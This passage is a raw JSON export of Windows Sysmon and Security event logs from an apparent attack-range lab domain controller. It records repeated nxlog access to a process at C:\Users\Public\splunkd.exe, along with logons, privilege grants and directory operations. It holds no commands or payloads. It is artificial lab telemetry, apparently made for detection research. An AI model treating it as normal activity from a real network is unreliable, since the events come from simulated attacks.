2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:49.117","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:49:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220324,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4B46F\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x4b46f","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:49:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220325,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x4B46F\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{84587115-398E-4BE5-5705-9593D4B595D1}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::bd2f:79cc:df6c:109f\r\n\tSource Port:\t\t52580\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x4b46f","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{84587115-398E-4BE5-5705-9593D4B595D1}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::bd2f:79cc:df6c:109f","IpPort":"52580","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:49:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4662,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14080,"OpcodeValue":0,"RecordNumber":220326,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An operation was performed on an object.\r\n\r\nSubject :\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4B46F\r\n\r\nObject:\r\n\tObject Server:\t\tDS\r\n\tObject Type:\t\t%{bf967a86-0de6-11d0-a285-00aa003049e2}\r\n\tObject Name:\t\t%{380696a9-4b33-495b-b632-8aae86d71c90}\r\n\tHandle ID:\t\t0x0\r\n\r\nOperation:\r\n\tOperation Type:\t\tObject Access\r\n\tAccesses:\t\tWrite Property\r\n\t\t\t\t\r\n\tAccess Mask:\t\t0x20\r\n\tProperties:\t\tWrite Property\r\n\t\t{e48d0154-bcf8-11d1-8702-00c04fb96050}\r\n\t\t\t{f3a64788-5306-11d1-a9c5-0000f80367c1}\r\n\t{bf967a86-0de6-11d0-a285-00aa003049e2}\r\n\r\n\r\nAdditional Information:\r\n\tParameter 1:\t\t-\r\n\tParameter 2:\t\t","Category":"Directory Service Access","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x4b46f","ObjectServer":"DS","ObjectType":"%{bf967a86-0de6-11d0-a285-00aa003049e2}","ObjectName":"%{380696a9-4b33-495b-b632-8aae86d71c90}","OperationType":"Object Access","HandleId":"0x0","AccessList":"%%7685\r\n\t\t\t\t","AccessMask":"0x20","Properties":"%%7685\r\n\t\t{e48d0154-bcf8-11d1-8702-00c04fb96050}\r\n\t\t\t{f3a64788-5306-11d1-a9c5-0000f80367c1}\r\n\t{bf967a86-0de6-11d0-a285-00aa003049e2}\r\n","AdditionalInfo":"-","EventReceivedTime":"2020-08-01 06:49:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4662,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14080,"OpcodeValue":0,"RecordNumber":220327,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An operation was performed on an object.\r\n\r\nSubject :\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4B46F\r\n\r\nObject:\r\n\tObject Server:\t\tDS\r\n\tObject Type:\t\t%{bf967a86-0de6-11d0-a285-00aa003049e2}\r\n\tObject Name:\t\t%{380696a9-4b33-495b-b632-8aae86d71c90}\r\n\tHandle ID:\t\t0x0\r\n\r\nOperation:\r\n\tOperation Type:\t\tObject Access\r\n\tAccesses:\t\tWrite Property\r\n\t\t\t\t\r\n\tAccess Mask:\t\t0x20\r\n\tProperties:\t\tWrite Property\r\n\t\t{e48d0154-bcf8-11d1-8702-00c04fb96050}\r\n\t\t\t{f3a64788-5306-11d1-a9c5-0000f80367c1}\r\n\t{bf967a86-0de6-11d0-a285-00aa003049e2}\r\n\r\n\r\nAdditional Information:\r\n\tParameter 1:\t\t-\r\n\tParameter 2:\t\t","Category":"Directory Service Access","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x4b46f","ObjectServer":"DS","ObjectType":"%{bf967a86-0de6-11d0-a285-00aa003049e2}","ObjectName":"%{380696a9-4b33-495b-b632-8aae86d71c90}","OperationType":"Object Access","HandleId":"0x0","AccessList":"%%7685\r\n\t\t\t\t","AccessMask":"0x20","Properties":"%%7685\r\n\t\t{e48d0154-bcf8-11d1-8702-00c04fb96050}\r\n\t\t\t{f3a64788-5306-11d1-a9c5-0000f80367c1}\r\n\t{bf967a86-0de6-11d0-a285-00aa003049e2}\r\n","AdditionalInfo":"-","EventReceivedTime":"2020-08-01 06:49:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220328,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4535F\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x4535f","LogonType":"3","EventReceivedTime":"2020-08-01 06:49:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2613,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:50.121\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:50.121","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:49:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2614,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:51.125\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:51.125","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2615,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:51.956\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:51.956","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2616,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:51.956\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 